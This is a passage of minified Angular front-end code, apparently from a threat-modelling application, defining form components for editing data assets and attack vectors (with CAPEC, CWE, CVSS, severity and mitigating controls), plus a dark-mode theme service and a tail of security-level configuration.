4eb63-48d8-41e8-aeb1-ef767a5fb572"],"Levels":[{"Name":"Security Level 1","Abbr":"SL1","Description":"Prevent the unauthorized disclosure of information via eavesdropping or causal exposure"},{"Name":"Security Level 2","Abbr":"SL2","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using simple means with low resources, generic skills and low motivation "},{"Name":"Security Level 3","Abbr":"SL3","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with moderate resources, IACS specific skills and moderate motivation "},{"Name":"Security Level 4","Abbr":"SL4","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with extended resources, IACS specific skills and high motivation"}]}]}');function gwe(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){return be(e),Me(V().myData.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Cwe(t,a){1&t&&(m(0,"mat-hint",14),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function ywe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V();F("value",e),g(1),ke(re(2,2,i.GetSensitivity(e)))}}function bwe(t,a){if(1&t){const e=Ye();m(0,"mat-option",19),he("click",function(){const r=be(e).$implicit;return Me(V(3).SetAssetGroup(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function Mwe(t,a){if(1&t&&(m(0,"mat-optgroup",17),s(1,"\n "),ne(2,bwe,2,3,"mat-option",18),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Key),g(2),F("ngForOf",e.Value)}}function vwe(t,a){if(1&t&&(m(0,"mat-form-field",0),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",15),s(7,"\n "),ne(8,Mwe,4,2,"mat-optgroup",16),s(9,"\n "),u(),s(10,"\n "),u()),2&t){const e=V();g(3),ke(re(4,3,"general.Assets")),g(3),F("value",e.GetAssetGroup()),g(2),F("ngForOf",e.GetAssetGroups())}}function Awe(t,a){if(1&t){const e=Ye();m(0,"table",20),s(1,"\n "),m(2,"tr")(3,"td")(4,"mat-checkbox",21),he("change",function(){const r=be(e).$implicit,c=V();return Me(c.ImpactCatChanged(c.myData,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(4),F("checked",i.myData.ImpactCats.includes(e)),g(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let v5=(()=>{class t{constructor(e,i){this.dataService=i,this.showAssetGroup=!1,e&&(this.myData=e,this.showAssetGroup=!0)}ngOnInit(){if(this.assetGroups=[],this.myData.IsProjectData){const e=this.dataService.Project.GetProjectAssetGroup();let i={Key:e.Name,Value:[e,...e.GetGroupsFlat()]};this.assetGroups.push(i),this.dataService.Project.GetDevices().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)}),this.dataService.Project.GetMobileApps().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)})}else this.assetGroups.push({Key:"Assets",Value:[this.dataService.Config.AssetGroups,...this.dataService.Config.AssetGroups.GetGroupsFlat()]})}SetAssetGroup(e){let i=this.GetAssetGroup();i&&i.RemoveMyData(this.myData),e.AddMyData(this.myData)}GetAssetGroups(){return this.assetGroups}GetAssetGroup(){return this.myData.FindAssetGroup()}GetSensitivity(e){return An.ToString(e)}GetSensitivities(){return An.GetKeys()}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Pu,8),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-mydata"]],inputs:{myData:"myData",showAssetGroup:"showAssetGroup"},decls:63,vars:31,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill","class","property-form-field",4,"ngIf"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip","click"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n "),m(2,"mat-form-field",0),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",1),he("ngModelChange",function(r){return i.myData.Name=r}),u(),s(9,"\n "),ne(10,gwe,6,3,"button",2),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-form-field",3),s(14,"\n "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n "),m(19,"input",4),he("ngModelChange",function(r){return i.myData.Number=r}),u(),s(20,"\n "),ne(21,Cwe,3,3,"mat-hint",5),s(22,"\n "),u(),s(23,"\n "),it(24,"br"),s(25,"\n "),m(26,"mat-form-field",6),s(27,"\n "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n "),m(32,"textarea",7),he("ngModelChange",function(r){return i.myData.Description=r}),u(),s(33,"\n "),u(),s(34,"\n "),it(35,"br"),s(36,"\n "),m(37,"mat-form-field",0),s(38,"\n "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n "),m(43,"mat-select",8),he("valueChange",function(r){return i.myData.Sensitivity=r}),oe(44,"translate"),s(45,"\n "),ne(46,ywe,3,4,"mat-option",9),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n "),it(50,"br"),s(51,"\n "),ne(52,vwe,11,5,"mat-form-field",10),s(53,"\n "),m(54,"h3"),s(55),oe(56,"translate"),u(),s(57,"\n "),m(58,"div",11),s(59,"\n "),ne(60,Awe,8,4,"table",12),s(61,"\n "),u(),s(62,"\n"),u()),2&e&&(g(5),ke(re(6,19,"general.Name")),g(3),at("matTooltip",i.myData.Name),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Name),g(2),F("ngIf",i.myData.Name),g(6),ke(re(17,21,"general.Number")),g(3),at("matTooltip",i.myData.Number),F("ngModel",i.myData.Number),g(2),F("ngIf",i.myData.CheckUniqueNumber()),g(8),ke(re(30,23,"properties.Description")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Description),g(8),ke(re(41,25,"properties.Sensitivity")),g(3),at("matTooltip",re(44,27,i.GetSensitivity(i.myData.Sensitivity))),F("value",i.myData.Sensitivity),g(3),F("ngForOf",i.GetSensitivities()),g(6),F("ngIf",i.showAssetGroup),g(3),ke(re(56,29,"properties.ImpactCategories")),g(5),F("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,br,da,nn,fp,un,jr,Nr,yr,gg,Go,Xa,Pa,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})(),Oa=(()=>{class t{constructor(e){this.locStorageService=e,this.ThemeChanged=new Tt,this.IsDarkMode=!0,setTimeout(()=>{let i=this.locStorageService.Get(si.DARK_MODE);this.SetDarkMode(null==i?this.IsDarkMode:"true"==i)},100)}get Color2(){return this.IsDarkMode?"#252525":"#F5F5F5"}SetDarkMode(e){this.ThemeChanged.emit(e),this.IsDarkMode=e,this.locStorageService.Set(si.DARK_MODE,String(this.IsDarkMode))}}return t.\u0275fac=function(e){return new(e||t)(At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Twe(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(V(3).attackVector.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Ewe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",29),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",30),he("ngModelChange",function(n){return be(e),Me(V(2).attackVector.Name=n)}),u(),s(9,"\n "),ne(10,Twe,6,3,"button",31),s(11,"\n "),u(),s(12,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,5,"properties.Name")),g(3),at("matTooltip",e.attackVector.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackVector.Name),g(2),F("ngIf",e.attackVector.Name)}}function Dwe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"mat-option",35),s(3),u(),s(4,"\n "),Mt()),2&t){const e=a.$implicit;g(2),F("value",e.ID),g(1),ct("\n ",e.Name,"\n ")}}function xwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n "),ne(2,Dwe,5,2,"ng-container",34),s(3,"\n "),u()),2&t){const e=V().$implicit;F("label",e.Name),g(2),F("ngForOf",e.SubGroups)}}function wwe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"mat-option",35),s(3),u(),s(4,"\n "),ne(5,xwe,4,2,"mat-optgroup",36),s(6,"\n "),Mt()),2&t){const e=a.$implicit;g(2),F("value",e.ID),g(1),ct("\n ",e.Name,"\n "),g(2),F("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function Iwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n "),ne(2,wwe,7,3,"ng-container",34),s(3,"\n "),u()),2&t){const e=V().$implicit;F("label",e.Name),g(2),F("ngForOf",e.SubGroups)}}function Rwe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"mat-option",35),s(3),u(),s(4,"\n "),ne(5,Iwe,4,2,"mat-optgroup",36),s(6,"\n "),Mt()),2&t){const e=a.$implicit;g(2),F("value",e.ID),g(1),ct("\n ",e.Name,"\n "),g(2),F("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function Swe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",29),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",33),he("selectionChange",function(n){return be(e),Me(V(2).OnGroupChanged(n))}),s(7,"\n "),ne(8,Rwe,7,3,"ng-container",34),s(9,"\n\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(2);let i,n;g(3),ke(re(4,4,"general.Group")),g(3),at("matTooltip",null==(i=e.GetAttackVectorGroup())?null:i.Name),F("value",null==(n=e.GetAttackVectorGroup())?null:n.ID),g(2),F("ngForOf",e.GetRootAttackVectorGroups())}}function kwe(t,a){if(1&t&&(m(0,"mat-option",39),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function Pwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n "),ne(2,kwe,2,3,"mat-option",38),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.ThreatCategories)}}function Owe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);g(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Nwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=V(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatIntroduced,r))}),u()()}if(2&t){const e=a.$implicit,i=V(2);g(1),F("checked",i.attackVector.ThreatIntroduced.includes(e))}}function Lwe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);g(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function zwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=V(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatExploited,r))}),u()()}if(2&t){const e=a.$implicit,i=V(2);g(1),F("checked",i.attackVector.ThreatExploited.includes(e))}}function Wwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetAttackVectorTypeName(e)))}}function Fwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",13),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(V(2).attackVector.AttackTechnique.CAPECID=n)}),u(),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,2,"properties.CAPECID")),g(3),F("ngModel",e.attackVector.AttackTechnique.CAPECID)}}function Vwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",13),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(V(2).attackVector.Weakness.CWEID=n)}),u(),s(9,"\n "),u(),s(10,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,2,"properties.CWEID")),g(3),F("ngModel",e.attackVector.Weakness.CWEID)}}function Bwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function Hwe(t,a){if(1&t&&(m(0,"mat-card",45),s(1,"\n "),m(2,"mat-card-title"),s(3),u(),s(4,"\n "),m(5,"mat-card-content"),s(6,"\n "),it(7,"app-capec-entry",46),s(8,"\n "),u(),s(9,"\n "),u()),2&t){const e=V(3);g(3),ct("CAPEC-",e.attackVector.AttackTechnique.CAPECID,""),g(4),F("capecID",e.attackVector.AttackTechnique.CAPECID)}}function Uwe(t,a){if(1&t&&(bt(0),s(1,"\n "),it(2,"app-cvss-entry",43),s(3,"\n "),ne(4,Hwe,10,2,"mat-card",44),s(5,"\n "),Mt()),2&t){const e=V(2);g(2),F("entry",e.attackVector.AttackTechnique.CVSS),g(2),F("ngIf",e.attackVector.AttackTechnique.CAPECID)}}function qwe(t,a){if(1&t&&(m(0,"mat-card"),s(1,"\n "),m(2,"mat-card-title"),s(3),u(),s(4,"\n "),m(5,"mat-card-content"),s(6,"\n "),it(7,"app-cwe-entry",47),s(8,"\n "),u(),s(9,"\n "),u()),2&t){const e=V(3);g(3),ct("CWE-",e.attackVector.Weakness.CWEID,""),g(4),F("cweID",e.attackVector.Weakness.CWEID)}}function Gwe(t,a){if(1&t&&(bt(0),s(1,"\n "),ne(2,qwe,10,2,"mat-card",1),s(3,"\n "),Mt()),2&t){const e=V(2);g(2),F("ngIf",e.attackVector.Weakness.CWEID)}}function jwe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){const r=be(e).$implicit;return Me(V(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;g(1),ke(e.Name)}}function Qwe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",48),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedControl=r)}),s(1,"\n "),m(2,"mat-icon",49),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",50),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"button",51),he("click",function(){const r=be(e).$implicit;return Me(V(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n "),m(14,"button",52),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,8,e.Name)),g(3),at("matTooltip",re(10,10,"general.Remove")),g(5),at("matTooltip",re(15,12,"general.Delete"))}}function $we(t,a){if(1&t&&(m(0,"div",53),s(1,"\n "),it(2,"app-control",54),s(3,"\n "),u()),2&t){const e=V(2);g(2),F("control",e.selectedControl)("canEditName",!0)("canEditGroup",!0)}}function Kwe(t,a){if(1&t&&(s(0,"\n "),it(1,"app-threat-rule",58),s(2,"\n ")),2&t){const e=V().$implicit;g(1),F("canEdit",!1)("showAttackVector",!1)("threatRule",e)}}function Xwe(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10,"info"),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),ne(14,Kwe,3,3,"ng-template",57),s(15,"\n "),u()),2&t){const e=a.$implicit,i=V(3);g(5),ct("\n ",e.Name,"\n "),g(3),ct("\n ",i.GetThreatRestriction(e),"\n ")}}function Ywe(t,a){if(1&t&&(m(0,"div",55),s(1,"\n "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-accordion",56),s(7,"\n "),ne(8,Xwe,16,2,"mat-expansion-panel",34),s(9,"\n "),u(),s(10,"\n "),it(11,"br"),s(12,"\n "),u()),2&t){const e=V(2);g(3),ke(re(4,2,"general.ThreatRules")),g(5),F("ngForOf",e.GetThreatRules())}}function Jwe(t,a){1&t&&(m(0,"div",55),s(1," \n "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n "),u()),2&t&&(g(3),ke(re(4,1,"pages.config.threatlibrary.noRuleOrQuestion")))}function Zwe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),ne(2,Ewe,13,7,"ng-container",1),s(3,"\n "),m(4,"mat-form-field",2),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(V().attackVector.Description=n)}),u(),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-form-field",2),s(14,"\n "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(V().attackVector.Adversaries=n)}),u(),s(20,"\n "),u(),s(21,"\n "),ne(22,Swe,11,6,"mat-form-field",4),s(23,"\n "),m(24,"mat-form-field",2),s(25,"\n "),m(26,"mat-label"),s(27),oe(28,"translate"),u(),s(29,"\n "),m(30,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().attackVector.ThreatCategories=n)}),s(31,"\n "),ne(32,Pwe,4,2,"mat-optgroup",6),s(33,"\n "),u(),s(34,"\n "),u(),s(35,"\n "),m(36,"table",7),s(37,"\n "),m(38,"tr"),s(39,"\n "),m(40,"td",8)(41,"strong"),s(42),oe(43,"translate"),u()(),s(44,"\n "),ne(45,Owe,3,3,"td",9),s(46,"\n "),u(),s(47,"\n "),m(48,"tr"),s(49,"\n "),m(50,"td",8)(51,"strong"),s(52),oe(53,"translate"),u()(),s(54,"\n "),ne(55,Nwe,2,1,"td",10),s(56,"\n "),u(),s(57,"\n "),m(58,"tr"),s(59,"\n "),m(60,"td",8)(61,"strong"),s(62),oe(63,"translate"),u()(),s(64,"\n "),ne(65,Lwe,3,3,"td",9),s(66,"\n "),u(),s(67,"\n "),m(68,"tr"),s(69,"\n "),m(70,"td",8)(71,"strong"),s(72),oe(73,"translate"),u()(),s(74,"\n "),ne(75,zwe,2,1,"td",10),s(76,"\n "),u(),s(77,"\n "),u(),s(78,"\n "),m(79,"mat-form-field",11),s(80,"\n "),m(81,"mat-label"),s(82),oe(83,"translate"),u(),s(84,"\n "),m(85,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().attackVector.OriginTypes=n)}),s(86,"\n "),ne(87,Wwe,3,4,"mat-option",12),s(88,"\n "),u(),s(89,"\n "),u(),s(90,"\n "),ne(91,Fwe,11,4,"ng-container",1),s(92,"\n "),ne(93,Vwe,11,4,"ng-container",1),s(94,"\n "),m(95,"mat-form-field",13),s(96,"\n "),m(97,"mat-label"),s(98),oe(99,"translate"),u(),s(100,"\n "),m(101,"mat-select",14),he("valueChange",function(n){return be(e),Me(V().attackVector.Severity=n)}),s(102,"\n "),m(103,"mat-option"),s(104),oe(105,"translate"),u(),s(106,"\n "),ne(107,Bwe,3,4,"mat-option",12),s(108,"\n "),u(),s(109,"\n "),u(),s(110,"\n "),ne(111,Uwe,6,2,"ng-container",1),s(112,"\n "),ne(113,Gwe,4,1,"ng-container",1),s(114,"\n "),m(115,"div",15),s(116,"\n "),m(117,"div",16),s(118,"\n "),m(119,"mat-list",17),he("cdkDropListDropped",function(n){be(e);const r=V();return Me(r.dropControl(n,r.GetControls()))}),s(120,"\n "),m(121,"div",18),s(122),oe(123,"translate"),m(124,"button",19),oe(125,"translate"),m(126,"mat-icon"),s(127,"add"),u()(),s(128,"\n "),m(129,"mat-menu",null,20),s(131,"\n "),m(132,"button",21),he("click",function(){return be(e),Me(V().AddControl())}),s(133),oe(134,"translate"),u(),s(135,"\n "),m(136,"button",22),s(137),oe(138,"translate"),u(),s(139,"\n "),u(),s(140,"\n "),m(141,"mat-menu",null,23),s(143,"\n "),ne(144,jwe,2,1,"button",24),s(145,"\n "),u(),s(146,"\n "),u(),s(147,"\n "),ne(148,Qwe,19,14,"mat-list-item",25),s(149,"\n "),u(),s(150,"\n "),u(),s(151,"\n "),m(152,"div",26),s(153,"\n "),ne(154,$we,4,3,"div",27),s(155,"\n "),u(),s(156,"\n "),u(),s(157,"\n "),ne(158,Ywe,13,4,"div",28),s(159,"\n "),ne(160,Jwe,6,3,"div",28),s(161,"\n"),u()}if(2&t){const e=Ti(130),i=Ti(142),n=V();Ct("disable",!n.canEdit),g(2),F("ngIf",n.isShownInDialog),g(5),ke(re(8,47,"properties.Description")),g(3),F("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Description),g(6),ke(re(17,49,"properties.Adversaries")),g(3),F("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Adversaries),g(3),F("ngIf",n.isShownInDialog||!n.canEdit),g(5),ke(re(28,51,"general.ThreatCategories")),g(3),F("value",n.attackVector.ThreatCategories),g(2),F("ngForOf",n.GetThreatCategoryGroups()),g(10),ke(re(43,53,"pages.config.attackvector.introduced")),g(3),F("ngForOf",n.GetLifeCycles()),g(7),ke(re(53,55,"pages.config.attackvector.during")),g(3),F("ngForOf",n.GetLifeCycles()),g(7),ke(re(63,57,"pages.config.attackvector.exploitable")),g(3),F("ngForOf",n.GetLifeCycles()),g(7),ke(re(73,59,"pages.config.attackvector.during")),g(3),F("ngForOf",n.GetLifeCycles()),g(7),ke(re(83,61,"properties.AttackVectorType")),g(3),F("value",n.attackVector.OriginTypes),g(2),F("ngForOf",n.GetAttackVectorTypes()),g(4),F("ngIf",n.attackVector.OriginTypes.includes(2)),g(2),F("ngIf",n.attackVector.OriginTypes.includes(1)),g(5),ke(re(99,63,"properties.Severity")),g(3),F("value",n.attackVector.Severity),g(3),ke(re(105,65,"properties.selectNone")),g(3),F("ngForOf",n.GetSeverityTypes()),g(4),F("ngIf",n.attackVector.OriginTypes.includes(2)),g(2),F("ngIf",n.attackVector.OriginTypes.includes(1)),g(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),g(3),ct("",re(123,67,"general.Controls")," \n "),g(2),at("matTooltip",re(125,69,"general.Add")),F("matMenuTriggerFor",e),g(9),ke(re(134,71,"general.New")),g(3),F("matMenuTriggerFor",i),g(1),ke(re(138,73,"general.Existing")),g(7),F("ngForOf",n.GetPossibleControls()),g(4),F("ngForOf",n.GetControls()),g(6),F("ngIf",n.selectedControl),g(4),F("ngIf",n.GetThreatRules().length>0),g(2),F("ngIf",0==n.GetThreatRules().length)}}let jg=(()=>{class t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.translate=c,this.canEdit=!0,this.isShownInDialog=!1,e&&(this.attackVector=e,this.isShownInDialog=!0),null!=i&&(this.canEdit=i.Value)}get attackVector(){return this._attackVector}set attackVector(e){this._attackVector=e,this.selectedControl=null}ngOnInit(){}GetAttackVectorTypes(){return eM.GetTypes()}GetAttackVectorTypeName(e){return eM.ToString(e)}LifeCycleChanged(e,i){const n=e.indexOf(i);n>=0?e.splice(n,1):e.push(i)}GetLifeCycles(){return y2.GetKeys()}GetLifeCycleName(e){return y2.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetRootAttackVectorGroups(){return this.dataService.Config.ThreatLibrary.SubGroups}GetAttackVectorGroup(){return this.dataService.Config.FindGroupOfAttackVector(this.attackVector)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetThreatRules(){return this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.AttackVector)||void 0===i?void 0:i.ID)==this.attackVector.ID})}GetThreatRestriction(e){return Fg.ToString(e,this.dataService,this.translate)}GetPossibleControls(){return this.dataService.Config.GetControls().filter(e=>!e.MitigatedAttackVectors.includes(this.attackVector))}AddExistingControl(e){e.AddMitigatedAttackVector(this.attackVector)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedAttackVector(this.attackVector),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedAttackVector(this.attackVector),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.attackVector))}OnGroupChanged(e){let i=this.dataService.Config.GetAttackVectorGroup(e.value),n=this.dataService.Config.FindGroupOfAttackVector(this.attackVector);n&&n.RemoveAttackVector(this.attackVector),i.AddAttackVector(this.attackVector)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(zp,8),Ee(hf,8),Ee(Oa),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-vector"]],inputs:{attackVector:"attackVector",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],["style","text-align: center;",4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field",2,"margin-top","10px"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","125px","margin-left","10px"],[3,"value","valueChange"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["style","margin-top: 15px;",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[4,"ngFor","ngForOf"],[3,"value"],[3,"label",4,"ngIf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding","0 3px 0 